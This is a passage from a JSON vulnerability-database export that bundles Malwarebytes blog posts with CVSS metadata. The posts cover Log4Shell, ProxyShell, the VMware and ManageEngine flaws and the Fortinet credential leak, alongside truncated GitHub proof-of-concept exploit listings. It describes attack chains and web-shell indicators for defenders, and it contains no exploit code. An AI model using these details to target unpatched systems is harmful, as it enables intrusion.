notice or hear about a vulnerability that meets these "requirements" move it to the top of your "to-patch" list.\n\nStay safe, everyone!\n\nThe post [The top 5 most routinely exploited vulnerabilities of 2021](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-29T16:28:20", "type": "malwarebytes", "title": "The top 5 most routinely exploited vulnerabilities of 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-2685", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-40539", "CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-04-29T16:28:20", "id": "MALWAREBYTES:B8C767042833344389F6158273089954", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-19T15:00:35", "description": "The Cybersecurity & Infrastructure Security Agency has issued an Emergency Directive [ED 22-03](<https://www.cisa.gov/emergency-directive-22-03>) and released a [Cybersecurity Advisory (CSA)](<http://www.cisa.gov/uscert/ncas/alerts/aa22-138b>) about ongoing, and expected exploitation of multiple vulnerabilities in several VMware products.\n\n## Chaining unpatched VMware vulnerabilities\n\nThe title of the advisory is \u201cThreat Actors Chaining Unpatched VMware Vulnerabilities for Full System Control\u201d. That's a bit confusing since there are patches available for these vulnerabilities, but threat actors are actively attacking unpatched systems. \n\nThe advisory warns organizations that malicious threat actors, most likely advanced persistent threat (APT) actors, are exploiting CVE-2022-22954 and CVE-2022-22960 separately and in combination.\n\n[**CVE-2022-22954**](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22954>): VMware Workspace ONE Access and Identity Manager contain a remote code execution vulnerability due to server-side template injection. A malicious actor with network access can trigger a server-side template injection that may result in remote code execution.\n\nServer-side template injection is when an attacker is able to inject a malicious payload into a template, which is then executed server-side.\n\n[**CVE-2022-22960**](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22960>): VMware Workspace ONE Access, Identity Manager, and vRealize Automation contain a privilege escalation vulnerability due to improper permissions in support scripts. A malicious actor with local access can escalate privileges to root.\n\nBoth these vulnerabilities were patched on April 6, 2022. But it took malicious threat actors less than 48 hours to reverse engineer the vendor updates to develop an exploit and start exploiting these disclosed vulnerabilities in unpatched devices.\n\nOn May 18, 2022, CISA said it expects malicious threat actors to quickly develop a capability to exploit CVE-2022-22972 and CVE-2022-22973 as well.\n\n[**CVE-2022-22972**](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22972>): is an authentication bypass vulnerability in VMware Workspace ONE Access, Identity Manager and vRealize Automation that affects local domain users. In order to exploit this vulnerability, a remote attacker capable of accessing the respective user interface could bypass the authentication for these various products.\n\n[**CVE-2022-22973**](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22973>): is a local privilege escalation vulnerability in the VMware Workspace ONE Access and Identity Manager. In order to exploit this vulnerability, an attacker would need to have local access to the vulnerable instances of Workspace ONE Access and Identity Manager. Successful exploitation would allow an attacker to gain \u201croot\u201d privileges.\n\n## Mitigation\n\nCISA strongly encourages all organizations to deploy the updates provided in VMware Security Advisory [VMSA-2022-0014](<https://www.vmware.com/security/advisories/VMSA-2022-0014.html>) or remove those instances from networks. CISA added CVE-2022-22954 and CVE-2022-22960 to its [catalog of known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), and federal, executive branch, departments, and agencies were all required to patch those vulnerabilities by May 5 and May 6 respectively. It stands to reason that the two new vulnerabilities will follow suit.\n\nCISA encourages organizations with affected VMware products that are accessible from the Internet to assume they have been compromised and to initiate threat hunting activities. To help with the threat hunting, CISA has provided detection methods and indicators of Compromise (IOCs) in the [CSA](<https://www.cisa.gov/uscert/ncas/alerts/aa22-138b>).\n\nIn the Response Matrix, as listed in the [VMWare advisory](<https://www.vmware.com/security/advisories/VMSA-2022-0014.html>), you can find the impacted products and versions.\n\nThe post [VMWare vulnerabilities are actively being exploited, CISA warns](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/05/vmware-vulnerabilities-are-actively-being-exploited-cisa-warns/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-19T12:42:13", "type": "malwarebytes", "title": "VMWare vulnerabilities are actively being exploited, CISA warns", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954", "CVE-2022-22960", "CVE-2022-22972", "CVE-2022-22973"], "modified": "2022-05-19T12:42:13", "id": "MALWAREBYTES:76A60CFA2FA67B3D288E8C0349CFEBF8", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/05/vmware-vulnerabilities-are-actively-being-exploited-cisa-warns/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-21T11:57:15", "description": "Businesses and governments these days are relying on dozens of different Software-as-a-Service (SaaS) applications to run their operations \u2014 and it\u2019s no secret that hackers are always looking for security vulnerabilities in them to exploit.\n\nAccording to [research by BetterCloud](<http://pages.bettercloud.com/rs/719-KZY-706/images/2020_StateofSaaSOpsReport.pdf?mkt_tok=NzE5LUtaWS03MDYAAAF8LQdmoC7u54xbqxNwp0au4Zk7SiYaaqq2vupXFxCvaP5vY8gSQtlGFsUsRI8oj5Fl2m5PwIZUUAlzVZL_-hUEQ2RdNqgEzDAmZA5bZtowS_v-zMs>), the average company with 500 to 999 employees uses about 93 different SaaS applications, with that number rising to 177 for companies with over 1000 employees.\n\nCoupled with the fact that vendors release thousands of updates each year to patch security vulnerabilities in their software, it\u2019s not surprising that businesses and governments are struggling to keep up with the [volume of security vulnerabilities and patches](<https://media.bitpipe.com/io_15x/io_152272/item_2184126/ponemon-state-of-vulnerability-response-.pdf>).\n\nAnd lo and behold, despite the best efforts of governments and businesses around the globe, hackers still managed to exploit [multiple security vulnerabilities in 2021](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021/>).\n\nIn this post, we\u2019ll take a look at five times governments and businesses got hacked thanks to security vulnerabilities in 2021.\n\n## 1\\. APT41 exploits Log4Shell vulnerability to compromise at least two US state governments\n\nFirst publicly announced in early December 2021, [Log4shell](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/12/what-smbs-can-do-to-protect-against-log4shell-attacks/>) ([CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>)) is a critical security vulnerability in the popular Java library Apache Log4j 2. The vulnerability is simple to execute and enables attackers to perform [remote code execution](<https://blog.malwarebytes.com/glossary/remote-code-execution-rce-attack/>).\n\nA patch for Log4Shell was released on 9 December 2021, but within hours of the initial December 10 2021 announcement, hacker groups were already racing to exploit Log4Shell before businesses and governments could patch it \u2014 and at least one of them was successful.\n\nShortly after the advisory, the Chinese state-sponsored hacking group APT41 exploited Log4Shell to compromise at least two US state governments, according to research from [Mandiant](<https://www.mandiant.com/resources/apt41-us-state-governments>). Once they gained access to internet-facing systems, APT41 began a months-long campaign of [reconnaissance ](<https://blog.malwarebytes.com/glossary/recon/>)and credential harvesting.\n\n## 2. North Korean government backed-groups exploit Chrome zero-day vulnerability\n\nOn February 10 2022, Google's Threat Analysis Group (TAG) [discovered that two North Korean government backed-groups ](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/02/update-now-chrome-patches-actively-exploited-zero-day-vulnerability/>)exploited a vulnerability ([**CVE-2022-0609**](<https://nvd.nist.gov/vuln/detail/CVE-2022-0609>)) in Chrome to attack over 250 individuals working for various media, fintech, and software companies.\n\nThe activities of the two groups have been tracked as [Operation Dream Job](<https://www.clearskysec.com/operation-dream-job/>) and[ AppleJeus](<https://securelist.com/operation-applejeus/87553/>), and both of them used the same [exploit kit](<https://blog.malwarebytes.com/threats/exploit-kits/>) to collect sensitive information from affected systems.\n\nHow does it work, you ask? Well, hackers exploited a use-after-free (UAF) vulnerability in the Animation component of Chrome \u2014 which, just like Log4Shell, allows hackers to perform remote code execution.\n\n## 3. Hackers infiltrate governments and companies with ManageEngine ADSelfService Plus vulnerability\n\nFrom September 17 through early October, hackers successfully compromised at least nine companies and 370 servers by[ exploiting a vulnerability** **](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/fbi-and-cisa-warn-of-apt-groups-exploiting-adselfservice-plus/>)[**(CVE-20**](<https://nvd.nist.gov/vuln/detail/cve-2021-40539>)**[2](<https://nvd.nist.gov/vuln/detail/cve-2021-40539>)**[**1-40539)**](<https://nvd.nist.gov/vuln/detail/cve-2021-40539>)[ in ManageEngine ADSelfService Plus](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/fbi-and-cisa-warn-of-apt-groups-exploiting-adselfservice-plus/>), a self-service password management and single sign-on solution.\n\nSo, what happens after hackers exploited this vulnerability? You guessed it \u2014 remote code execution. Specifically, hackers uploaded a [payl](<https://blog.malwarebytes.com/glossary/payload/>)[oad ](<https://blog.malwarebytes.com/glossary/payload/.>)to a victims network that installed a webshell, a malicious script that grants hackers a persistent gateway to the affected device.\n\nFrom there, hackers [moved laterally](<https://blog.malwarebytes.com/glossary/lateral-movement/>) to other systems on the network, exfiltrated any files they pleased, and [even stole credentials](<https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/>).\n\n## 4. Tallinn-based hacker exploits Estonian government platform security vulnerabilities\n\n[In July 2021](<https://www.ria.ee/en/news/police-and-border-guard-board-and-information-system-authority-stopped-illegal-downloading-data.html>), Estonian officials announced that a Tallinn-based male had gained access to KMAIS, Estonia\u2019s ID-document database, where he downloaded the government ID photos of 286,438 Estonians.\n\nTo do this, the hacker exploited a vulnerability in KMAIS that allowed him to obtain a person's ID photo using queries. Specifically, KMAIS did not sufficiently check the validity of the query received \u2014 and so, using fake digital certificates, the suspect could download the photograph of whoever he was pretending to be.\n\n## 5. Russian hackers exploit Kaseya security vulnerabilities\n\nKaseya, a Miami-based software company, provides tech services to thousands of businesses over the world \u2014 and on July 2 2021, Kaseya CEO Fred Voccola had an urgent message for Kaseya customers: [shut down your servers immediately](<https://www.zdnet.com/article/updated-kaseya-ransomware-attack-faq-what-we-know-now/>).\n\nThe urgency was warranted. [Over 1,500 small and midsize businesses](<https://blog.malwarebytes.com/cybercrime/2021/07/shutdown-kaseya-vsa-servers-now-amidst-cascading-revil-attack-against-msps-clients/>) had just been attacked, with attackers asking for $70 million in payment.\n\nA Russian-based cybergang known as REvil claimed responsibility for the attack. According to Hunteress Labs, REvil [exploi](<https://www.cisa.gov/uscert/ncas/current-activity/2021/07/04/cisa-fbi-guidance-msps-and-their-customers-affected-kaseya-vsa>)[ted a zero-day](<https://www.cisa.gov/uscert/ncas/current-activity/2021/07/04/cisa-fbi-guidance-msps-and-their-customers-affected-kaseya-vsa>) ([CVE-](<https://nvd.nist.gov/vuln/detail/CVE-2021-30116>)[2021-30116](<https://nvd.nist.gov/vuln/detail/CVE-2021-30116>)) and performed an authentication bypass in Kaseya's web interface \u2014 allowing them to deploy [a ransomware attack](<https://blog.malwarebytes.com/ransomware/2021/07/3-things-the-kaseya-attack-can-teach-us-about-ransomware-recovery/>) on MSPs and their customers.\n\n## Organizations need a streamlined approach to vulnerability assessment\n\n[Hackers took advantage](<https://blog.malwarebytes.com/hacking-2/2022/05/10-ways-attackers-gain-access-to-networks/>) of many security vulnerabilities in 2021 to breach an array of governments and businesses.\n\nAs we broke down in this article, hackers can range from individuals to whole state-sponsored groups \u2014 and we also saw how vulnerabilities themselves can appear in just about any piece of software regardless of the industry.\n\nAnd while some vulnerabilities are certainly worse than others, the sheer volume of vulnerabilities out there makes it difficult to keep up with the volume of security patches. With the right [vulnerability management](<https://www.malwarebytes.com/cybersecurity/business/what-is-vulnerability-management>) and[ patch management](<https://www.malwarebytes.com/cybersecurity/business/what-is-patch-management>), however, your organization can find (and correct) weak points that malicious hackers, viruses, and other cyberthreats want to attack.\n\nWant to learn more about different vulnerability and patch management tools? Visit our [Vulnerability and Patch Management page](<https://www.malwarebytes.com/business/vulnerability-patch-management>) or read the [solution brief](<https://www.malwarebytes.com/resources/easset_upload_file46277_212091_e.pdf>).\n\nThe post [Security vulnerabilities: 5 times that organizations got hacked](<https://blog.malwarebytes.com/business-2/2022/06/security-vulnerabilities-5-times-that-organizations-got-hacked/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-06-21T10:04:02", "type": "malwarebytes", "title": "Security vulnerabilities: 5 times that organizations got hacked", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30116", "CVE-2021-40539", "CVE-2021-44228", "CVE-2022-0609"], "modified": "2022-06-21T10:04:02", "id": "MALWAREBYTES:4CB01833826116B2823401DFB69A5431", "href": "https://blog.malwarebytes.com/business-2/2022/06/security-vulnerabilities-5-times-that-organizations-got-hacked/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-17T14:35:09", "description": "In a [joint advisory](<https://us-cert.cisa.gov/ncas/alerts/aa21-259a>) the FBI, the United States Coast Guard Cyber Command (CGCYBER), and the Cybersecurity and Infrastructure Security Agency (CISA) warn that advanced persistent threat (APT) cyber-actors may be exploiting a vulnerability in ManageEngine's single sign-on (SSO) solution.\n\n### The vulnerability\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). The vulnerability in questions is listed under [CVE-2021-40539](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40539>) as a REST API authentication bypass with resultant remote code execution (RCE) in Zoho ManageEngine ADSelfService Plus version 6113 and prior.\n\nThe vulnerability allows an attacker to gain unauthorized access to the product through REST API endpoints by sending a specially crafted request. This would allows attackers to carry out subsequent attacks resulting in RCE.\n\nFor those that have never heard of this software, it's a self-service password management and single sign-on (SSO) solution for Active Directory (AD) and cloud apps. Which means that any attacker that is able to exploit this vulnerability immediately has access to some of the most critical parts of a corporate network.\n\n### In-the-wild exploitation\n\nWhen [word of the vulnerability came out](<https://threatpost.com/zoho-password-manager-zero-day-attack/169303/>) it was already clear that is was being exploited in the wild. Zoho remarked that it was noticing indications of this vulnerability being exploited. Other [researchers](<https://twitter.com/voodoodahl1/status/1435673340539281410>) chimed in saying the attacks had thus far been highly targeted and limited, and possibly the work of a single threat-actor. Yesterday's joint advisory seems to support that, telling us that APT cyber-actors are likely among those exploiting the vulnerability. \n\nThey find this of high concern since this poses a serious risk to critical infrastructure companies. CISA recognizes [16 critical infrastructure sectors](<https://www.cisa.gov/critical-infrastructure-sectors>) whose "assets, systems, and networks, whether physical or virtual, are considered so vital to the United States that their incapacitation or destruction would have a debilitating effect on security, national economic security, national public health or safety, or any combination thereof."\n\nThe joint advisory points out that the suspected APT cyber-actors have targeted academic institutions, defense contractors, and critical infrastructure entities in multiple industry sectors\u2014including transportation, IT, manufacturing, communications, logistics, and finance.\n\nIt also warns that successful exploitation of the vulnerability allows an attacker to place web shells, which enable the adversary to conduct post-exploitation activities, such as compromising administrator credentials, conducting lateral movement, and exfiltrating registry hives and Active Directory files.\n\nAccording to the advisory, the JavaServer Pages web shell arrives as a `.zip` file "masquerading as an x509 certificate" called `service.cer`. The web shell is then accessed via the URL path `/help/admin-guide/Reports/ReportGenerate.jsp`. \n\nHowever, it warns:\n\n> Confirming a successful compromise of ManageEngine ADSelfService Plus may be difficult\u2014the attackers run clean-up scripts designed to remove traces of the initial point of compromise and hide any relationship between exploitation of the vulnerability and the web shell.\n\nPlease consult the advisory for a [full list of IOCs](<https://us-cert.cisa.gov/ncas/alerts/aa21-259a>).\n\n### Mitigation\n\nA patch for this vulnerability was made available on September 7, 2021. Users are advised to update to ADSelfService Plus build 6114. The FBI, CISA, and CGCYBER also strongly urge organizations to make sure that ADSelfService Plus is not directly accessible from the Internet.\n\nThe [ManageEngine site](<https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html>) has specific instructions on how to identify and update vulnerable installations. It also has information about how you can reach out to support if you need further information, have any questions, or face any difficulties updating ADSelfService Plus.\n\nStay safe, everyone!\n\nThe post [FBI and CISA warn of APT groups exploiting ADSelfService Plus](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/fbi-and-cisa-warn-of-apt-groups-exploiting-adselfservice-plus/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-09-17T13:48:46", "type": "malwarebytes", "title": "FBI and CISA warn of APT groups exploiting ADSelfService Plus", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-40539"], "modified": "2021-09-17T13:48:46", "id": "MALWAREBYTES:B6DA5FE033D50131FABF027A2BB04385", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/fbi-and-cisa-warn-of-apt-groups-exploiting-adselfservice-plus/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-09T16:34:58", "description": "A threat actor has leaked a list of almost 500,000 Fortinet VPN credentials, stolen from 87,000 vulnerable FortiGate SSL-VPN devices. The breach list provides raw access to organizations in 74 countries, including the USA, India, Taiwan, Italy, France, and Israel, with almost 3,000 US entities affected.\n\nAccording to [Fortinet](<https://www.fortinet.com/blog/psirt-blogs/malicious-actor-discloses-fortigate-ssl-vpn-credentials>) the credentials were obtained from systems that remained unpatched against [CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>) at the time of the actor's scan. **Even if the devices have since been patched, if the passwords were not reset, they remain vulnerable.**\n\n### CVE-2018-13379\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services).\n\nThe vulnerability in question provides an improper limitation of a pathname to a restricted directory in several Fortinet FortiOS and FortiProxy versions. The vulnerable SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP requests. Apparently the FortiOS system files also contained login credentials.\n\nIn April, CVE-2018-13379 was mentioned in a joint [advisory](<https://blog.malwarebytes.com/malwarebytes-news/2021/04/patch-now-nsa-cisa-and-fbi-warn-of-russian-intelligence-exploiting-5-vulnerabilities/>) from the NSA, CISA, and the FBI as one of five vulnerabilities widely used in on-going attacks by the Russian Foreign Intelligence Service (SVR). A patch for the vulnerability has been available since May 2019, but this patch has not been applied as widely as necessary.\n\n### The threat actor\n\nThe source, and the websites that leaked the information, make for an interesting story as well. The list of Fortinet credentials was leaked by someone going by the handle 'Orange.' Orange is also the administrator of the newly launched RAMP hacking forum, and a previous operator of the Babuk Ransomware operation.\n\nAfter the [announced retirement of the Babuk gang](<https://blog.malwarebytes.com/reports/2021/06/babuk-ransomware-builder-leaked-following-muddled-retirement/>), Orange apparently went his own way and started RAMP. Orange is now involved in the Groove ransomware operation, which allegedly employs several former Babuk developers. The leak of Fortinet VPN SSL credentials was mirrored on the Groove leak website. Both posts lead to a file hosted on a Tor storage server known to be used by the Groove gang.\n\nRansomware leak sites are used to create some extra leverage over victim organizations. The ransomware attackers steal data from the infiltrated system while they deploy their ransomware. They then threaten to publish the data if the victim decides not to pay. Depending on the kind of data, this can be a rather compelling reason to give in.\n\n### Vulnerable security software\n\nOrganizations use Virtual Private Networks (VPNs) to provide remote access to their systems from the Internet. By design a VPN is remotely accessible so employees can reach them from anywhere, which also means that attackers can reach them from anywhere. And since VPNs provide access to an organization's soft underbelly, a VPN that has a known vulnerability represents a high value target that's easy to reach.\n\nThat makes swift patching an absolute necessity, but many organizations find this difficult, in part because VPNs are so important for remote working. If an inability to patch promptly is compounded by delays in detecting new systems added to networks, and a lack of regular vulnerability scanning, attackers are left with a lot of room to work with.\n\nA leak of this type is serious since valid VPN credentials could allow threat actors to access a network to steal data, expand their access, and run ransomware or other malware.\n\nIn light of the leak, Fortinet is recommending companies to immediately disable all VPNs, upgrade the devices to FortiOS 5.4.13, 5.6.14, 6.0.11, or 6.2.8 and above, followed by initiating an organization-wide password reset, warning that you may remain vulnerable post-upgrade if your users' credentials were previously compromised.\n\nThe post [500,000 Fortinet VPN credentials exposed: Turn off, patch, reset passwords](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/500000-fortinet-vpn-credentials-exposed-turn-off-patch-reset-passwords/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-09T15:37:43", "type": "malwarebytes", "title": "500,000 Fortinet VPN credentials exposed: Turn off, patch, reset passwords", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2021-09-09T15:37:43", "id": "MALWAREBYTES:1476491C6EB2E7829EC63A183A35CE8B", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/500000-fortinet-vpn-credentials-exposed-turn-off-patch-reset-passwords/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "githubexploit": [{"lastseen": "2022-03-12T14:43:07", "description": "# ProxyShell_POC\nPOC for ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-02T07:29:24", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34523", "CVE-2021-31207", "CVE-2021-34473"], "modified": "2022-03-12T13:42:54", "id": "E458F533-4B97-51A1-897B-1AF58218F2BF", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T19:01:02", "description": "# ProxyShell\nProof of Concept Exploit for Microsoft Exchange CVE...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-04T15:34:03", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-03-23T18:03:46", "id": "2D0AC1C7-F656-5D6B-9FC2-79525014BE1E", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-05T16:21:50", "description": "# Log4j Threat Hunting and Incident Response Resources\n\n## Lates...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-09T08:22:24", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-34473", "CVE-2021-44228"], "modified": "2022-01-10T19:21:49", "id": 